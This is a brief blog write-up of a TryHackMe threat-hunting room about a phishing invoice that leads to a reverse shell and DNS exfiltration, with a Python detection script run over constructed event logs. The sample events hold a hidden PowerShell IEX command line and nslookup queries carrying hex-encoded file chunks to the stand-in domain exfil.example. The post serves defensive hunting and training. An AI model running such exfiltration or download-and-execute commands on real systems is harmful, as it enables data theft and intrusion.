Threat Hunting Case Study | The Strange Invoice | TryHackMe Hunt Me 1: Payment Collectors

Motasem Hamdan
2 min read, Jun 24, 2024


We covered a threat hunting challenge that involved hunting through Windows event logs exported from a machine compromised by a recent phishing email.

The hunt started with finding the initial attachment that was downloaded using Outlook and later on extracted.

The extracted files contained a payment invoice in PDF form that, when opened, spawned a PowerShell process. That process downloaded a reverse shell and connected to the attacker's C2 server, from which further commands were launched to enumerate the system and finally to exfiltrate data from a file server using the nslookup tool.
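The chain above (document reader spawning PowerShell, then nslookup carrying data out over DNS) can be hunted with two simple rules over process-creation events. The following is an added example, not code from the room or the author: it runs over constructed Sysmon-style records with ECS-like field names (an assumption about the export format), and every host, domain and URL in the sample is a placeholder.

```python
"""Hunt logic for the phishing chain described above, run over constructed
Sysmon EventID 1 style records (hypothetical sample data, not the room's logs).
Field names mimic Elastic ECS: process.parent.name, process.name, ..."""
import re
from collections import Counter

# Constructed sample events: benign download, PDF reader spawning PowerShell,
# enumeration, then three nslookup calls carrying hex-encoded file chunks.
SAMPLE_EVENTS = [
    {"host": "WKSTN-PLACEHOLDER", "process.parent.name": "OUTLOOK.EXE",
     "process.name": "explorer.exe",
     "process.command_line": "explorer.exe C:\\Users\\user\\Downloads"},
    {"host": "WKSTN-PLACEHOLDER", "process.parent.name": "AcroRd32.exe",
     "process.name": "powershell.exe",
     "process.command_line": "powershell.exe -nop -w hidden -c IEX (...PLACEHOLDER...)"},
    {"host": "WKSTN-PLACEHOLDER", "process.parent.name": "powershell.exe",
     "process.name": "whoami.exe", "process.command_line": "whoami /all"},
] + [
    {"host": "WKSTN-PLACEHOLDER", "process.parent.name": "powershell.exe",
     "process.name": "nslookup.exe",
     "process.command_line": f"nslookup -type=TXT {chunk}.exfil.example"}
    for chunk in ("4d5a90000300", "0000040000ff", "ff0000b80000")
]

# Document/mail readers that should rarely launch a scripting host directly.
OFFICE_READERS = {"outlook.exe", "winword.exe", "excel.exe", "acrord32.exe", "acrobat.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
HEX_LABEL = re.compile(r"^[0-9a-f]{10,}$", re.I)  # long hex-only leftmost DNS label

def hunt(events, min_queries=3):
    """Return (suspicious_child_spawns, dns_exfil_suspects).

    suspicious_child_spawns: (parent, child, command_line) tuples where a reader
    launched a shell. dns_exfil_suspects: (parent_domain, query_count) pairs for
    domains that received >= min_queries nslookup queries with hex-like labels."""
    child_spawns = []
    exfil_labels = Counter()
    for ev in events:
        parent = ev["process.parent.name"].lower()
        child = ev["process.name"].lower()
        cmd = ev["process.command_line"]
        if parent in OFFICE_READERS and child in SHELLS:
            child_spawns.append((parent, child, cmd))
        if child == "nslookup.exe":
            # First non-option argument is the queried name.
            args = [p for p in cmd.split()[1:] if not p.startswith("-")]
            if args:
                labels = args[0].split(".")
                if HEX_LABEL.match(labels[0]):
                    exfil_labels[".".join(labels[1:])] += 1
    exfil = [(d, n) for d, n in exfil_labels.items() if n >= min_queries]
    return child_spawns, exfil
```

In Kibana the same two conditions map to a KQL filter on `process.parent.name` and `process.name`, plus a terms aggregation on the nslookup query's parent domain.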

The scenario

On Friday, September 15, 2023, Michael Ascot, a Senior Finance Director from SwiftSpend, was checking his emails in Outlook and came across an email appearing to be from Abotech Waste Management regarding a monthly invoice for their services. Michael actioned this email and downloaded the attachment to his workstation without thinking.

The following week, Michael received another email from his contact at Abotech claiming they were recently hacked and to carefully review any attachments sent by their employees. However, the damage has already been done. Use the attached Elastic instance to hunt for malicious activity on Michael’s workstation and within the SwiftSpend domain!

Check out the video below for a detailed explanation.

Room Answers | TryHackMe Hunt Me I: Payment Collectors

Room answers can be found here.

Video Walkthrough | TryHackMe Hunt Me 1: Payment Collectors


Motasem Hamdan

Motasem Hamdan is a cybersecurity consultant and content creator. He is also a marketing expert and growth hacker. https://www.youtube.com/@MotasemHamdan